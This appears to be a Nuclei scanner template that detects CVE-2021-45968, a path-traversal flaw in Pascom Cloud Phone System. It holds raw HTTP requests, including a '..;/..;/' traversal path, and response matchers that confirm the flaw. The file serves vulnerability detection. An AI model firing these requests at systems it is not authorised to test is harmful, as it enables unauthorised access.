44 lines
1.2 KiB
YAML
44 lines
1.2 KiB
YAML
id: CVE-2021-45968
|
|
|
|
info:
|
|
name: Pascom CPS - Local File Inclusion
|
|
author: dwisiswant0
|
|
severity: high
|
|
description: |
|
|
Pascom packaged with Cloud Phone System (CPS) versions before 7.20 contain a known local file inclusion vulnerability.
|
|
reference:
|
|
- https://kerbit.io/research/read/blog/4
|
|
- https://www.pascom.net/doc/en/release-notes/
|
|
- https://tutorialboy24.blogspot.com/2022/03/the-story-of-3-bugs-that-lead-to.html
|
|
- https://nvd.nist.gov/vuln/detail/CVE-2021-45968
|
|
classification:
|
|
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
|
|
cvss-score: 7.5
|
|
cve-id: CVE-2021-45968
|
|
cwe-id: CWE-22
|
|
tags: cve,cve2021,pascom,lfi
|
|
|
|
requests:
|
|
- raw:
|
|
- |
|
|
GET /services/pluginscript/ HTTP/1.1
|
|
Host: {{Hostname}}
|
|
|
|
- | # Double parent to access CMS index
|
|
GET /services/pluginscript/..;/..;/ HTTP/1.1
|
|
Host: {{Hostname}}
|
|
|
|
- | # Verifying CMS
|
|
GET / HTTP/1.1
|
|
Host: {{Hostname}}
|
|
|
|
req-condition: true
|
|
matchers:
|
|
- type: dsl
|
|
dsl:
|
|
- "status_code_2 != status_code_1"
|
|
- "contains(body_2, 'pascom GmbH & Co KG') || contains(body_3, 'pascom GmbH & Co KG')" # Verifying CMS
|
|
condition: and
|
|
|
|
# Enhanced by mp on 2022/06/29
|